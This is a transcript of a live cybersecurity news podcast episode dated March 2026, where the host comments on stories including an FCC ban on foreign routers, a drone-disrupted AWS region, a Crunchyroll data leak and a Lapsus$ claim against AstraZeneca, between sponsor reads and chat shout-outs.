A
All right, good morning, everybody. Welcome to the party. Today is Wednesday, March 26th, 25th, 2026. This is episode 1096 of your Simply Cyber Daily Cyber Threat Brief podcast. I am your host, Dr. Gerald Auger. And if you're looking to stay current on the top cyber news stories of the day while going beyond those headlines to get additional insights, value and basically just crush it like, speed-run a cyber career development, then you're in the right place. We're gonna go through eight stories, I'm gonna break them down. Chat is above me right here and we are going to be crushing. I'm coming to you live from San Francisco, 5:00am Pacific Time, left coast, people. I'm telling you, I, I feel you. I feel you. Let's get going. Also good news. The audio. Welcome to the party, pal. Hopefully that didn't blow anyone's ears out. Let me know in chat. We're off and running. All right, what's up everybody? Definitely appreciate you here. Shout out to casually Joseph, who got into the studio behind or ahead of time to help me troubleshoot all this. I think we have it all together, which makes it a little bit more exciting. Good morning everyone. What's up? I want to say hello to Luca Lima and Marlon J. Steve Young. Slate Killer. Mad Destroyer. Coffee cup. Cheers. Mad Destroyer. Mad Destroyer is our resident coffee aficionado. I want you to know I'm drinking instant coffee, Starbucks, French Roast. Mad Destroyer. But you can go ahead and roll, just roll and writhe in disgust at what I'm doing to coffee this morning. Guys, we got a great show for you. As I mentioned in the intro, we're going to go through eight stories. I don't research or prep for any of these stories. It just makes the show better. I have no idea what I'm going to say and it, you know, it's going to be exciting. It's our last day here in San Francisco. 
As soon as the show is over, I'm going to pack all this gear up, head to the airport and then begin schlepping across the country back to my family and to the east coast where the time zone is, you know, a time zone that I think is a good time zone. Oh my God. So Phil Stafford, just throwing shade at my tortured bean water. Guys, I want to tell you every episode, whether I'm drinking this cup of coffee or I've got Mad Destroyer whipping up some tasty, you know, espresso using some type of high end machine from beans that were picked by a left handed man on the side of a mountain in the Andes. Every episode is worth half a CPE. So don't be shy. Say what's up in chat. Grab a screenshot if you're on mobile. We haven't quite solved that yet, but the deal is you, you'll be part of the show. You can see Cyber Rob getting in here with his CPEs. The title of the show has today's date, March 25th, as well as a unique identifier, episode 1096. So basically it's an hour show, but 30 minutes of it, we goof around. 30 minutes we work. So that's why we say half a CPE. Believe me, you have more CPEs than you know what to do with. But advice being part of the Simply Cyber Daily Cyber Threat Brief. 120 possible per year. So say what's up? Grab that screenshot and file it away. Once a year, count screenshots, divide by two. Simple as that. I also want to say what's up? Welcome to the party. Hello. Here we go. Welcome to the party, pal. If you are here for the first time, I do not have OBS quick links here. So I have to do this. I have to do this manually like a heathen. If you are here for the first time, do drop a hashtag first timer in chat. Hashtag first timer in chat. Thank you, neckbeard. First timer in chat. And we want to celebrate you. Like, basically you might be like, oh, why would you celebrate me? I just got here. Like, listen, dude, welcome to the party. Welcome to the community. 
We want you to understand, everybody that's here for the first time was a first timer at some point. And they all said they were here for the first time and we all celebrated them. So don't be shy, we don't bite. We're all about good times. And if you do see someone in chat for the first time, ad Tech and Billy O'Reillena and Space Tacos and others, use that squad emote that. John McLean. Welcome to the party, pal. Welcome to the party. And let's welcome them. Mr. Buddha, Mr. Budalicious. Mr. Budalicious, here for the first time. Welcome to the party. Mr. Brutalicious. Definitely appreciate you being here. And since I can't do the. I can't do the on screen stuff because I'm, you know, in the mobile studio. Let's do this really quickly. This is my janky alternative solution, but it works. You know what I'm saying, Alan Bruh. All right. Hey, Mr. Budalicious. Welcome to the party, pal. We got you covered for days. I hope you enjoy the stream. Enjoy the show. Now, every episode of the Daily Cyber Threat Brief is brought to you by the show's sponsors. Those sponsors, not only do I, you know, appreciate them as like, basically preferred partners like ThreatLocker, Antisyphon and Flare, all three of them sponsored the Daily Cyber Threat Brief for the entire year, which gives me peace of mind that I can do the show and invest in the programming and everything and not be super sweaty about trying to chase down sponsors. James McQuiggin, welcome to all the first timers. This is an amazing community. One day you two will reach 39 months. What's up, James? Love it, love it, love it. So let's hear from the stream sponsors also. Shout out to Flare. They hosted me for dinner last night. It was quite nice. John Hammond was there. We hung out and high fived and I ate a. I ate a ridiculous amount of meat. Probably an absurd amount of meat, dude. Shout out to Flare. Go to simplycyber.io/flare. 
Hopefully you guys, some of you were able to do the 50 Shades of Bulletproof Hosting training yesterday. Let me know if you did that. Training's behind us, but Kimberly can fix it. Coming off the top rope to drop the people's elbow, she says, James, one day you two will be at 49 months. LOL. I want everyone to know that like Kim, Kim even has like more months than I do. Like on the stream. Yeah, let me go. Yeah. Oh my God. One day I too will be where Kim and Justin are. Where Kim. Kim and Justin are. I can't believe I am. I'm the host and I, I ridiculously, I'm at 37 months. So yay. Celebrate to me. All right, so hey, listen, Flare Cyber Threat Intelligence platform is absolutely sick. If you'd like to check it out, there's a two week free trial. I know many of you have already checked it out. If you have your own opinions in chat, I'm not going to censor you. If you think it's good, if you think it's bad, drop your thoughts in chat. I personally have used it. I think there's great value in it. And I know the people at Flare. It's not a huge company. I know the people there. I like the people there. I think they're very, very genuine people who are doing great work. So got to meet a new one last night in Andrean Bergeron, great researcher over at Flare. If you'd like to check out this platform, go to simplycyber.io/flare now and sign up. The thing is, they have to identify, verify your identity before they give you access to this information because it's like way too valuable. So go check that out if you will. Kyle says the Flare training was great. Thank you for commenting, Kyle. Definitely not, not surprised by that. The 50 Shades of Bulletproof Hosting is very cool. If you want, I think they have those shows on replay. You can go check that out also. Shout out to Antisyphon Training. Guys, today is the day. The SOC Summit is today at 10am so soon as the show ends, you know, go, you know, get a, get a sub from Publix. 
Get, you know, get situated, get a little cooler, put it next to your desk. You're not going to want to miss this dude, all day training today, virtual, free. Still time to register I suspect to get this. And I just want to tell you really quickly of all these speakers who are talking, you know, Cheddarbob is a Simply Cyber community member. Wade Wells is a Simply Cyber community member. And I want to let you know Dan Reardon and I are in a private group chat. Oh, Dennis Keefe, 18 months. The community has helped me grow more than I could have imagined. 18 months. And Marcus Kyler at 39 months. James McCrug and I became squad members at the same time. And he reminds me to send mine. Ben Long. Thank you Marcus and Dennis. Guys, I'm in a private DM with Dan Reardon. This talk, this guy has been working on this talk for weeks. Like not just the slides and everything but like delivering it. Delivering it like an absolute boss. Go to Antisyphon Training. Check out the SOC Summit if you've got time. He'll. He's going live at 2:30 Eastern Time. So if you only got time for like one talk, make that. I will be somewhere over the Rockies at this point but I do want to say Dan, I'm, I'm super pumped for you as well as all the other speakers. But like I just am like hit the bell for notifications on watching Dan Reardon's career. It's epic. All right. And finally ThreatLocker, Zero Trust platform, application security, denied by default. They've moved to the cloud with a big recent update and upgrade to the platform. Love myself some ThreatLocker. Go check it out. Quick word from them and then I'm going to melt your face. Mr. Buddha. I want to give some love to the Daily Cyber Threat Brief sponsor ThreatLocker. Do zero day exploits and supply chain attacks keep you up at night? Worry no more. You can harden your security with ThreatLocker. Worldwide companies like JetBlue trust ThreatLocker to secure their data and keep their business operations flying high. 
ThreatLocker takes a deny by default approach to cyber security and provides a full audit of every action allowed or blocked for risk management and compliance. Onboarding and operation is fully supported by their US based Cyber Hero support team. Get a free 30 day trial and learn more about how ThreatLocker can help prevent ransomware and ensure compliance. Visit threatlocker.com/dailycyber. All right and really quickly during the ad read Fleetus post in the third delivering 20 gifted memberships. Fletus thank you so much buddy. Did we just become best friends? Yep. Definitely appreciate the support obviously and then also sharing the love and getting 20 new members into the community. And if you are a squad member, basically your name will change to green on stream as well as you'll get access to a squad emote tray. Reaper DOE says they have a question. All caps. So screaming from the back row, I have a question. Reaper, we're going to do the show right now, but stay tuned. At the top of the hour we're going to do a different show where I'll take as many questions as the chat has. So save that question and I will do everything in my power to get you an answer. But right now what I need you to do Mr. Buddha and Fleetus post in the third, Mad Destroyer, Top Hat Cat, what I need you to do is sit back, relax and just let the cool sounds of the hot news, oh my God, spicy, wash over you in an awesome wave. I will catch you guys at the mid roll. Let's go. Hold on. I know the audio is not right. Hold on.
B
These are the cyber security headlines for Wednesday, March 25, 2026. I'm Rich Stroffolino.
A
All right.
B
FCC bans foreign routers. The U.S. Federal Communications Commission updated its covered list of products that will be barred from FCC clearance in the US to include all foreign consumer grade routers. It previously added most foreign made drones to the list. This plan applies to new device models, so devices already on the market and previously purchased routers are not impacted. The FCC cited malicious actors have exploited security gaps in foreign made routers to attack American households, disrupt networks and enable espionage and facilitate intellectual property theft as the reason for the ban. Router makers can appeal for conditional approval to sell in the US with a petition to the Department of Defense or Homeland Security.
A
Bro, bro, bro. All right. That's one way to make America great again. Just ban the selling of technology from other countries. So this is like all right, guy, my guy. Listen, I don't even know how you enforce this? Okay, like, so this is not a cyber security story. Okay, like what they're saying here. There's been some, there's been some, there's been some talk in the last, I don't know, six months or whatever that TP-Link, specifically a Chinese based device, a router switch kind of thing, they make a bunch. TP-Link is a business, not a device type. Okay. And there was some suspicion that like China was basically making these routers and then selling them like at, at a loss, effectively on Amazon. So you know, if, if me and you are going to buy a router and we just sort by price and we're a general end user and we don't know any difference between like this router and that router, it just delivers packets. Well, then I'll take the cheapest one. I'll take two of them. What the hell, right? So the argument was that like China was like slowly seeding US infrastructure with devices that they, they had compromised, they had a back door in persistence mechanisms. All this other crap, this has been rumor. My, my man. Like there are so many people in our industry who do hardware hacking. There's so many people in our industry who tinker and do making and stuff. You can take this TP-Link router and you can dump the firmware and reverse it, flip it, spin it, smack it, whatever you want and see if there is baked in malware or malicious intent. Oh, by the way, you can stick the TP-Link router on, on a, on a, on a network and span port out and look to see if it reaches out for C2 communication. I have seen zero research or any independent information on any of these devices doing any of this stuff. Okay? So to me, like, what are you basing this law? Like what are you basing this on? You know what I mean? Like it, it just seems like, I don't, I don't know, man. 
It seems like authoritarian propaganda. Like you can't, like, no, you can't buy these devices. If this is like a, a financial play, fine. But don't, don't, don't dress it in national security clothing. This isn't a cyber story, guy. I don't even know how this is going to work. Two things. One, DJ B said this too. Like what? Routers are not made like outside the US, like what, what are our options now? You know what I mean? And then think about fair market too. Like, so now I can only buy a TP-Link router, cost 100 bucks. But now, now my only option is a thousand dollar router that's made in Ohio. I don't know. Just, I, I'm not, I'm not a fan. I'm actually annoyed by this. I'm annoyed by this. Let's see. Like, my, my thing is there's been no evidence to suggest that these are implanted with malware or anything like that. Says malicious. And here's the thing. The FCC says malicious actors have exploited security gaps in foreign made routers to attack American households. Dude, any router that has default creds on it can be accessed. I don't care if it's made in Toledo or it's made in Taiwan. Plus, again, like, I'm going to get on to the next story in a second. I'm getting like super annoyed by this story. What about routers that are made in friendly countries? Like, so if the UK makes a router, Australia makes a router, Japan makes a router, Taiwan makes a router, South Korea makes a router, those are banned. This is like the most ham-fisted, blunt policy making I've seen in a while, my man. Whatever. And by the way, like, hold on. Like, by the way, like, what are you gonna stop at routers for? You know what I mean? Like, like drones are made somewhere else. My TV has an IP address and it was made in Korea. You know what I mean? Like, like what? I don't know, man. I don't know. I don't know. I'm not a fan. Not a fan. Let me know in chat if you think I'm like, overreacting. Number one, this isn't a cyber story, okay? And number two, I think this is poppycock. 
Complete hogwash.
B
Disrupts AWS region. For the second time in a month, Amazon saw an AWS region disrupted due to proximity to the US Israeli war on Iran. The company confirmed its Bahrain region suffered a disruption due to drone activity. Without going into too many specifics, it's not clear if the facility was hit directly by a drone, it was struck nearby, or something else. It's unclear how long the disruption will last. Amazon said it's in the process of helping to migrate customers to alternate regions in the interim. Amazon said the previous drone strike on a UAE facility earlier this month caused water damage, structural damage, disrupted power delivery to our infrastructure, and in some cases required fire suppression.
A
All right. Hey, Slate Killer, squad membership. Thanks, dude. Okay, so here's the deal. In 2026, this is like a reality when we look at the OSI stack, which I'll show you on stream right now, OSI stack, okay? And I know John Strand wants to personally fight anyone who, who uses the OSI stack, but anyways, listen, this is a network stack, okay? The bottom is the bits and bytes going across the wire. The orange one is the NIC or the network interface card, like the thing that the cable plugs into the actual board, okay? And then the yellow is the network layer. This is where you get your IP address. The light green is transport. This is listening services, like port 80, port 443, web traffic, whatever. And then above it is data and apps. Okay, here's my thing. When you try to connect to something like AWS and it doesn't work, the first thing most people do is pop open a command shell and ping the IP address. This is Network Troubleshooting 101, okay? And if you've been around for like 15 seconds, you already know this, all right? We typically try to work on that yellow and light green layer when we're trying to solve the problem. It's not super common. Or eventually we get to the physical layer. Even like my studio setup on Monday, I was like a hot mess express. It's because I had a hardware issue with the software, couldn't see the hardware or whatever, right? So a lot of times when we think of cyber and attacks and everything, we're thinking of, you know, denial of service at the network layer, or we're thinking of exploitation of, you know, some listening service and getting up into the. To the endpoint. Well, the reality is sometimes it's at the physical layer, and when you launch a kinetic explosive into a data center, it. It impacts the physical layer, right? So this, this is like. That's what I'm saying. In 2026, like, up until now, we haven't had to really deal with physical layer problems of this kind of material. 
And now it's got to be written into your risk profile. So if you are operating, what does this mean for you as a practitioner? Right? Because you might be like, what's, what's the deal with this one? Listen, if you are supporting an organization that's international, if you're supporting an organization that relies on AWS for, you know, for delivering services as well as business continuity. If you're in multiple regions, like the Middle East is in conflict right now, and this is something that you absolutely should think about in your risk profile. I will let you know, like, as an example, because you might be like, what does this even mean? What's this guy talking about? Let me give you an example. Like Netflix, right? When you go on Netflix and you want to stream Ted Lasso, and I know Ted Lasso is not on Netflix, I just selected that as an example. Or Altered Carbon. Okay, let's pick one that's really there. And you want to stream Altered Carbon. If, if you're in San Francisco and you're streaming Altered Carbon. Or if you're in Australia and you're streaming Altered Carbon. Or if you're in Abu Dhabi or. Yeah, Abu Dhabi and you're streaming Altered Carbon, we're not pulling from the same resource. Okay? For stream quality, quality of service, consumer customer experience, there are multiple CDNs and servers hosting that catalog. And, and if you're in the Middle East, right, you're going, you're in Dubai, you're going to watch Altered Carbon. It's probably coming from this AWS Bahrain region. So that is how something like this could affect you. So if you are in this situation, you should be thinking about business continuity, disaster recovery. Because if a drone blows up a data center, you can't restore that from backups like, spoiler alert, physical layer is physical layer. Also while we're here, since I, I love doing this personally and I'm feeling myself this morning. NIST 800-53, I'm going to say PE-6, physical and environmental monitoring. Physical access. 
No, that's like swipe badges and stuff. Is a PE-4. No, damn it. I want to, I want to basically bring people's attention to this. When we think of cybersecurity controls, a lot of times we're thinking of technical controls, operational controls, access, you know, creation, modification, termination. We're looking at patching and you know, vulnerability scanning, like very technical stuff. And that's because 85, 90% of our threats are cyber criminals, hackers, nation states. But don't sleep on the other 10%, which is like physical and environmental. I live in an area where hurricanes are quite real. We have to account for hurricanes. If you have a data center, like that's a, some small businesses and MSPs are definitely going to feel seen here for a second. If you have a data center which is basically a janitor closet in the hallway and that's where you like a couple servers coming into the business and there's like a slop sink in there or there's an air conditioner in there and, and you've mounted it above or the, the rack is like near the slop sink, water could get on that technology and cause it to malfunction or, or you know, destroy itself. So don't sleep on the physical environmental controls, okay? They are real controls. Shout out to NIST. I do love myself some NIST firm.
B
Data leak. Last week, an anonymous threat actor contacted several outlets claiming to have stolen roughly 100 gigabytes of Crunchyroll support ticket information. This information was allegedly obtained through a breached Telus employee account. After posting the information on a few illicit forums, the anime streaming giant confirmed the data was legitimate. This contains information on about 6.8 million people, exposing IP addresses, names, emails and partial credit card numbers. The threat actors asked for a $5 million ransom to not leak the data. But Crunchyroll did not negotiate.
A
All right, so I mean, Crunchyroll is an anime thing. I, I'm, I'm well aware of Crunchyroll. We are subscribers of Crunchyroll. Shout out to Crunchyroll for one member of my family. I, I don't have Crunchyroll on my, on my devices. Dude. Here's the deal. It's a tech company. They got hit with ransomware. They're not going to pay the, the ransom. Like, that's it, that's the story. I mean, Crunchyroll is well known. It is a, it is a tech business, but at the end of the day, that's all it is. It's cool that it's anime, but like it could have been Netflix, it could have been, you know, Tubi or whatever, Pluto, like, whatever. It's a streaming service. And the good news is I, I, here's the deal. I bet you anything if the ransomware attack had affected the, the delivery of content of Crunchyroll, they may have been more inclined to pay the ransom if, if that would have helped them get back up and running. But as far as I know, you know, Akira kept streaming, right? One Piece kept streaming. So like, there was no operational impact to the mission critical service of Crunchyroll, which is to deliver anime content to subscribers. I don't know the full extent of like what they got hit, whether it was just like, yeah, look at this. Okay, so again, I don't research or prep for these stories, so I don't know exactly what it's going to say or what I'm going to say, but they said at this time, we believe that the information is primarily limited to customer service ticket data following an incident with a third party vendor that is not remotely related to, to any type of operational delivery or mission critical service of Crunchyroll. And I know it's silly because it's a cartoon service and whatever, but like, if you boil it down and just think about it, it's brass tacks. This is a business that makes money by delivering streaming content to people that pay them money, and they had no impact to that. 
In fact, honestly, this seems like something that they don't even really need to execute. Business continuity. I'm not remotely surprised that they aren't going to pay the $5 million that it's. I feel like this is, like, basically hitting a speed bump at 30 miles an hour. They're just like. And just keep on going. Like, they didn't even. I didn't see any brake lights on. Crunchyroll, you're picking up what I'm putting down. All right, Way to go. Also, great opportunity to remind everybody you should be doing tabletop exercises. Tabletop exercises, everyone. Very, very powerful. I guess. Control. I wouldn't really think of tabletop exercises as a control. It technically is a control. But tabletop exercises is a phenomenal way to identify gaps in your overall response processes, identify gaps in knowledge or training of your staff, which is not, by the way, like, here's another thing. Like, if you're gonna do a tabletop exercise, I. I recommend it. Like, start with just the IT team and say, hey, we've had a ransomware attack. And, like, these servers are. Are down. What do we do? Don't. Don't make it a safe space, right? Like, so if Kevin is the one who does everything, you know, be like, hey, Kevin, like, you're on vacation for this exercise. So, like, your phone, you have no cell service. You're not in this room. All right? You get hit with ransomware. What do you guys do? Kevin's not here, right? So now maybe you identify that. Like, the rest of the staff have no frigging clue how to use Veeam. Or, like, Kevin is the only one who has an account into V and he didn't tell anyone because Kevin doesn't trust anyone else. Like, that's a huge finding. And it doesn't mean that Kevin made a mistake, although Kevin did make a mistake. We're just not going to call it out. Or it means. It doesn't mean that the junior staff who don't have accounts or don't have the training or anything are doing bad work. It's just an identified gap. 
And trust me, you want to solve this gap and close it over tacos on a Tuesday in April. Not when you're getting punched in the mouth by Akira ransomware, where they're demanding money and everything's gone to crap and. And you're down and you're not making money and your phone's ringing every 15 minutes because the CEO wants to know what the hell is going on. And you got legal counsel, you know, on the bridge, and you're working through the weekend. That is not the time to figure out that you have a gap in your training, your experience, your. Your workflows. All that. Tabletop exercises are unbelievably valuable. Go get some.
B
Today makes a bet on Bureau of Emerging Threats. After announcing it nearly a year ago, the US State Department formally launched this new entity with a mandate to protect American national security against advanced threats from foreign adversaries, specifically naming Iran, China, Russia, and North Korea. This includes cyber attacks as well as emerging threats such as quantum computing and AI enabled attacks and the weaponization of space. The Bureau of Emerging Threats will have five divisions. The Office of Critical Infrastructure Security, the Office of Cybersecurity, the Office of Disruptive Technology, the Office of Space Security, and the Office of Threat Assessment and.
A
Oh, my God. Okay, Office of. What was that? Like? Did they just, like, ask ChatGPT to, like, give them some new offices? Holy crap, dude. Look at this guy. This is a former chairman of the Parliament of Iran, but, like, I think we're burying the headline. My God, is this guy. Look at how many mics this dude has. This might be a record. Like, I've seen some press conferences at the Super Bowl. There was like six or seven mics. This dude is. This makes me think of like, you ever seen the. It's like bicycles in, like, maybe China or whatever, where the guy has, like, 30 phones on it and he's like, doing deliveries. This is nuts, dude. This is stupid. Why can't they just, like, pipe out the audio and let the reporters pick it up somewhere else? Good grief. And then I feel bad for, like, this far left one, this Ukrainian colored looking one on the far left. That guy's getting no audio. You might as well. You might as well get, like, you know, an ASL person on the side doing the sign language like they do during emergency services. All right, I digress. Thank you for letting me lose my mind on this microphone. All right, so they're having. The Bureau of Emerging Threats, where he revealed a sweeping reorganization plan for the department. Okay, here's my thing. Here's my thing. Okay. Yeah, thank you. Justin Gold. Here we go. Justin Gold with the assist. Okay, there we go. This is what I'm talking about. This is nuts. All right, here's my thing. Okay, I don't. I don't. I don't know. Like, I don't know. I don't think we need the Department of Emerging Threats. Like, to me, that is the capability of the staff of the Department of Defense or the NSA or Interior or Department of State. You know what I mean? Like, like, you should be like, guys, the whole reason we do the Daily Cyber Threat Brief is because as practitioners, we have to stay current on current and emerging threats. 
We don't stand up a new department for like, and by the way, like, DARPA, you know, like, like think tanks like MITRE and RAND and SRI, like JPL. Like, those think tanks are doing the research and delivering reports to decision makers on emerging threats. Like, why are we segmenting this out as its own thing? Like, again, I have a. I have a. I have a thought on why they're doing this, and I. I'm not going to share it because it's very political and I'm trying to keep this show apolitical. But, like, I don't know, man. I don't. Here's my thing too. Okay, really quickly. This isn't. This is a cyber adjacent story. The only thing I'll say about this is like, our, like, do we have budget for this? I guess that's all. How I'll put it. Do we have budget to stand up several new bureaus? I don't know. I don't know. And by the way, by the way, like, Department of Emerging Threats. To, like, look at quantum, my guy. Like, quantum's almost solved already. Looking at AI like, wait, wait. Like, the bus has. Like, you can't even see the back of the bus. The bus left so long ago on these. On these things. Maybe they're just using them as examples, but, like, I don't know. Not a fan. Today's news stories are a bit bothersome. Like, standing up all these new things and then like, banning the selling of foreign routers.
B
Thanks to today's sponsor, ThreatLocker. Least privilege isn't about distrusting users. It's about limiting blast radius. Many attacks succeed because malware inherits excessive permissions. Enforcing least privilege helps ensure that even if something goes wrong, attackers can't easily escalate access or move laterally across the environment. Learn more at threatlocker.com
A
All right, hold on. I'm gonna. I have to, like, manually turn the volume down so I can play. All right, that's the best I can do. Okay. All right, guys. Hey, again, this is the mid roll. We are a few minutes over. I do want to say really quickly, Reaper Doe. Who's. Who is. I'm pretty sure Reaper Doe is a first timer this week. So welcome back to the party, pal. Reaper Doe. And he asks, do they pay you to be filtered? No, no, it's just like, dude, when you talk religion or when you talk politics, it's the conversations break down because people get emotional and flip out. So I try to keep this show because this is for cyber security professionals and cyber adjacent professionals, because I do know we have sales people who join this call or join this session daily in order to better understand how cyber security practitioners think. But no one, like, you don't want to hear my politics or me flip out about stuff. But. But I will certainly talk about it. Just catch me IRL. I actually had a wonderful conversation with John Hammond and Nick Escoli last night about AI cyber hamburger. Hamburglar, 35 months. All right, hey, shout out to the stream sponsors ThreatLocker, Antisyphon and Flare. Genuinely appreciate them. Every single day of the week has a special segment. And Wednesdays is Way Back Wednesday where we kind of like, I don't know, talk about like a. An older tech and what it. What it was, what it used to be. Yeah, I'm trying to think, like, I, you know, I don't know. Here's. Okay, here's one for you, dude. People my kids will never know. Never know. You guys remember payphones, dude, you said, like, literally you would have to, like, carry change on you. When was the last time you had change on you? Wade Wells is in the chat. My man, Wade Wells. Welcome to the party. Yeah, Wade. I don't even say that word anymore. I'm trying to kill it, guys. Pay phones, dude, you used to have to, like, carry money. You would have to drive around and find a phone. 
The reason I bring it up is because phones in general. We were talking last night about modems and BBSs and dialing in and just shout out, like, if you didn't know this, like, say you're new to industry or you're young: payphones. There was an entire discipline within the hacking or cyber security community around abusing payphones. There was blue box, there was clear box. One of the coolest stories that I know of is Kevin Poulsen hacking not in Porsche. This guy. This was like early 90s, this guy, Kevin. Kevin Poulsen, he attacked Pacific Bell in like, I don't know, 19, whatever, 1990, attacking phones and stuff like that. And he won. Basically. A radio station was doing a contest where like, the 95th caller wins a Porsche and he hacked the phone systems and he was caller one, caller two, caller three, caller four, and then caller 95. And he won the Porsche, which is like a legend story. Obviously, it's illegal to do that and he was held accountable, but obviously he's exciting and successful now. So just a little fun. Fun fact: payphones. Just throw a little Way Back Wednesday vibes. All right, guys, we got the la la las. Let this wash over you. We're gonna get back into the news. Mr. Buddha. We do this every day. Let. This was. La. Yeah. I mean, while we're on the topic, casually Joseph dropped us in chat. But I mean, we. This is a legend thing right here. You should know about this. This is like, our industry's, like, lore, if you will. This is cyber security lore. You don't. This will never be on a Security+ exam. You'll never be asked in a job interview about this. But just know attacking phones was called phreaking, P-H-R-E-A-K-I-N-G, phreaking. And there was a guy named Captain Crunch who was like a legend phreaker. And it's because he could use the Captain Crunch whistles. And it. The. The actual toy that came in the cereal boxes happened to make a tone at the same frequency that pay phones would listen to. 
So he could use the whistle to like, basically get free calls and stuff like that. Cyber Shin and Gummy dropping his 22, 32 months. Excuse me. Blue badge. Thank you so much. Also, hey, really quickly for chat, I, I, I. When I was adding the Kool-Aid Man emote, I noticed that right now, I think if you're a member for one year or three years or something, you get the blue badge. We can do new badges for like four years, five years, all the way up, I think, into 10 years. So if you guys want that, to me, like, the blue is the, the community color blue. So I don't know if you'd want a new one, but I don't know, it'd be cool. If anyone has any ideas, drop that in chat. Yes, Kimberly can fix it. Talking about how you could make a collect call and they would ask you to say your name, but you could just say, like, come pick me up. And you can, like, hack it that way. Sierra Montgomery with her blue badge or squad membership badge. I love it. So good. All right, guys, let's keep cooking. Yeah. Oh, hold on one second.
B
US Treasury considers expanding terrorism insurance to cyber. The Treasury is seeking public comment in a Federal Register notice about the effectiveness of the Terrorism Risk Insurance Program, or TRIP. This was created in 2002 in the wake of the 9/11 attacks, providing a federal backstop to make terrorism risk insurance more available.
A
Thank you.
B
Mara Levy specifically asked for feedback on any potential changes to TRIP that would encourage the take-up of insurance for cyber related losses arising from acts of terrorism. Public comment will be accepted until May 8th, and the law authorizing TRIP is set to expire, or lapse, in 2027.
A
All right, so obviously 9/11. The Towers terrorism attack on U.S. soil. TJ with 11 month squad membership. Mara, leave me 20 months. Thank you. So, all right, let's see what this actually is because I, I don't. Nerman, my friend Nerman. Good to see you, Nerman. My thing is like, so cyber insurance is really wild. Okay? Cyber insurance is definitely valuable and you should have cyber insurance. But it's tricky because if you look at the NotPetya attack, specifically Zurich national or Zurich International, their insurance provider, they got absolutely ramroded by the NotPetya attack to the tune where like they actually tried not to pay out because they considered it an act of war. FedEx 23 months, my man, and Mondelez and Maersk shipping both got a huge. Not a payday but like they got made whole by Zurich International. So cyber insurance is definitely dodgy. So I don't know how the Treasury gets involved about terrorism cyber risk insurance program. But I don't know if it's such a great idea for public sector to backstop insurance programs. Especially if we get hit with like a pretty gnarly one. Yeah, see how it says federal backstop? I don't know. Here's my thing, here's my thing, okay. There's only one Internet and attacks happen all the time. Roswell UK and Luke Canfield, thank you very much. Squad memberships 30 months and 22 months for those guys. Great to see you guys. Now we're trinity two years. Good times. Love it. Listen, here's the deal. The problem with cyber insurance is like if, if, if you live in like a flood zone, it's easy for insurance companies to like adjust the rates. With cyber attacks it's very difficult because WannaCry crushed lots of businesses. But like, you know, Akira ransomware might hit one business, right? Like Crunchyroll got hit, right? So maybe you could say, oh, the likelihood of you getting a ransom attack is whatever. So here's your insurance policy. 
But these like, these cyber attacks, they can scale at such a level that it, it exposes the insurance companies to a lot of risk, financial risk. So having a federal backstop I feel like would put the United States in a pretty tricky position, like not bankrupt the US, right, but the idea is that like an insurance company would, would be protected if there was a, an attack, cyber attack that, you know, basically screwed over a bunch of businesses. Here's my thing. Define. Define a terror attack, right? Because B. Dash. Welcome to the squad, my man. Here's. Here's what I'll say about this. Clop ransomware hit tons of businesses last year. Okay. With the, with the Cleo. Madame Cleo. Lol. With the Cleo file server exploit. Change Healthcare. If you guys remember Change Healthcare last year got hit by. Who hit Change Healthcare? Was it RansomHub? It was actually. It was freaking. Oh my God. Who. Who did DarkSide become? They became BlackMatter. ALPHV BlackCat. Right, so ALPHV BlackCat hits Change Healthcare. They were a financially motivated cyber criminal organization, but they absolutely screwed over the healthcare industry at scale. Are you going to call that a terror attack? Like a terror attack like nation state backed? Or could it be something like, you know, Cobra, right? G.I. Joe and Cobra. Cobra wasn't nation state. They were just a terror faction. So I think that this is a very slippery slope and could expose the United States to some serious financial liability when it doesn't really need to be there. Because like, why? What's wrong with the insurance industry? Like they are. They've been doing insurance for hundreds of years. I think they're going to be okay. All right, so anyways, TL;DR, I don't know. I don't think the Treasury needs to do this, but if you have a separate opinion, drop it in chat. Those are just my thoughts.
B
Claims it breached AstraZeneca. The Lapsus$ extortion group added the pharma giant to its leak site. Researchers at SOCRadar report that known members of Lapsus$ have been boasting on illicit forums that it exfiltrated roughly 3 gigabytes of data from AstraZeneca. These allegedly include credentials, tokens, application code for controllers, repositories, services, schedulers, configuration files and Spring Boot resources, as well as employee data. Interesting. For an extortion group, there was no price set for these supposedly purloined data. SOCRadar says the nature of the stolen data suggests that it may have affected internal business operations.
A
All right, hold on. I haven't even pre-read this. I'm just reading this because Kimberly put it in chat and I have high, high, high trust for Kimberly not to screw me over. Chris Pattern says shared in LinkedIn but forgot YouTube is where the hotness is. This is true. Was able. Oh wait, actually I forgot I had. That was able to get a new gig as an infosec PM a few months back. Appreciate the constant perspective from the stream. Oh, my God. Okay, hold on one second. And Mr. Buddha, who's our first timer here, may not know this, but everybody does know this. Here we go. Here we go. We celebrate. We celebrate wins, like getting certs and stuff, but we also celebrate. Yes, sir. Yes, sir. Congratulations, Chris, and thanks for sharing with the community. Super pumped for you. Go crush it. I know it's been a few months, but I do have a video on the channel on how to absolutely destroy your. Your first 90 days like a boss. So go check that out. Where. Where's the story that. Okay, hold on. There we go. Know Your Threats. 40 months I'm here. Drink tea and sipping Simply Cyber. All right, love it. Know Your Threats. And thanks for 40 months. Know Your Threats. That's super cool, man. All right, listen, Big Pharma got hit. Lapsus$ is, you know, a very legit threat actor, right? They're part of the Com. They're this ShinyHunters, Lapsus$, Scattered Spider, you know, group. They do a lot of vishing or voice phishing. These guys compromised internal code, creds, and employee data. So let's see what's up. They only got three gigs of data, which is not a lot when it comes to like data exfil and extortion. It depends on what data it is, right? You know, if it's sensitive data, then that's a problem. All right, so they got creds and tokens. Those. Those tokens will have to be expired and the creds will have to be reset. Of course, that sucks. The internal code repositories, can't change that. That's. That is what that is. Let's see what else we got here. 
